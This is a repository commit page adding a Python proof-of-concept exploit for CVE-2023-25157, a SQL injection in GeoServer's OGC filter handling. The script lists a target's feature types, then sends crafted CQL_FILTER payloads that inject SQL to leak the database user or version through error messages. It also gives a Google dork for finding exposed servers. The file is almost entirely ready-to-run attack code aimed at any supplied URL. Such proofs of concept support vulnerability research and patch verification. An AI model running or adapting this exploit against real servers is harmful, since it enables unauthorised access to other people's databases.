STRLCPY/CVE-2023-25157

Add files via upload
Bipin Jitiya committed with GitHub 11 months ago

05b20f10

1 parent 90ac7b1e

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

CVE-2023-25157.py

1	+	#!/usr/bin/env python3
2	+	# -- coding: utf-8 --
3	+
4	+	"""
5	+	Title: GeoServer OGC Filter SQL Injection Vulnerabilities
6	+	CVE: CVE-2023-25157
7	+	Script Author: Bipin Jitiya (@win3zz)
8	+	Date: 06/06/2023
9	+	Google Dork: inurl:"/geoserver/ows?service=wfs"
10	+	Vendor/Software: https://github.com/geoserver/geoserver
11	+	Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10
12	+	References:
13	+	1. https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf
14	+	2. https://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d
15	+	3. https://twitter.com/parzel2/status/1665726454489915395
16	+	"""
17	+
18	+	import requests
19	+	import sys
20	+	import xml.etree.ElementTree as ET
21	+
22	+	# Colored output codes
23	+	GREEN = '\033[92m'
24	+	YELLOW = '\033[93m'
25	+	RED = '\033[91m'
26	+	ENDC = '\033[0m'
27	+
28	+	# Check if the script is run without parameters
29	+	if len(sys.argv) == 1:
30	+	print(f"{YELLOW}This script requires a URL parameter.{ENDC}")
31	+	print(f"{YELLOW}Usage: python3 {sys.argv[0]} <URL>{ENDC}")
32	+	sys.exit(1)
33	+
34	+	# URL and proxy settings
35	+	URL = sys.argv[1]
36	+	PROXY_ENABLED = False
37	+	PROXY = "http://127.0.0.1:8080/" if PROXY_ENABLED else None
38	+
39	+	response = requests.get(URL + "/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities", proxies={"http": PROXY}, verify=False)
40	+
41	+	if response.status_code == 200:
42	+
43	+	# Parse the XML response and extract the Name from each FeatureType and store in a list
44	+	root = ET.fromstring(response.text)
45	+	feature_types = root.findall('.//{http://www.opengis.net/wfs}FeatureType')
46	+	names = [feature_type.findtext('{http://www.opengis.net/wfs}Name') for feature_type in feature_types]
47	+
48	+	# Print the feature names
49	+	print(f"{GREEN}Available feature names:{ENDC}")
50	+	for name in names:
51	+	print(f"- {name}")
52	+
53	+	# Send requests for each feature name and CQL_FILTER type
54	+	cql_filters = ["strStartsWith"] # We can also exploit other filter/functions like "PropertyIsLike", "strEndsWith", "strStartsWith", "FeatureId", "jsonArrayContains", "DWithin" etc.
55	+	print(f"\n{YELLOW}Sending requests for each feature name and CQL_FILTER type:{ENDC}")
56	+	for name in names:
57	+	for cql_filter in cql_filters:
58	+	# Payload by @parzel2
59	+	#endpoint = f"/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName={name}&CQL_FILTER={cql_filter}%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true"
60	+	# Payload by Bipin Jitiya - @win3zz, we can use lat, alt and lon instead of 'name'
61	+	endpoint = f"/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName={name}&CQL_FILTER={cql_filter}%28lat%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true"
62	+	response = requests.get(URL + endpoint, proxies={"http": PROXY}, verify=False)
63	+
64	+	print(f"[+] Sending request for {name} with CQL_FILTER: {cql_filter}")
65	+	if response.status_code == 200:
66	+	root = ET.fromstring(response.text)
67	+	error_message = root.findtext('.//{http://www.opengis.net/ogc}ServiceException')
68	+	print(f"{GREEN}{error_message}{ENDC}")
69	+	else:
70	+	print(f"{RED}Request failed{ENDC}")
71	+	else:
72	+	print(f"{RED}Failed to retrieve XML data{ENDC}")
73	+
74	+

Add files via upload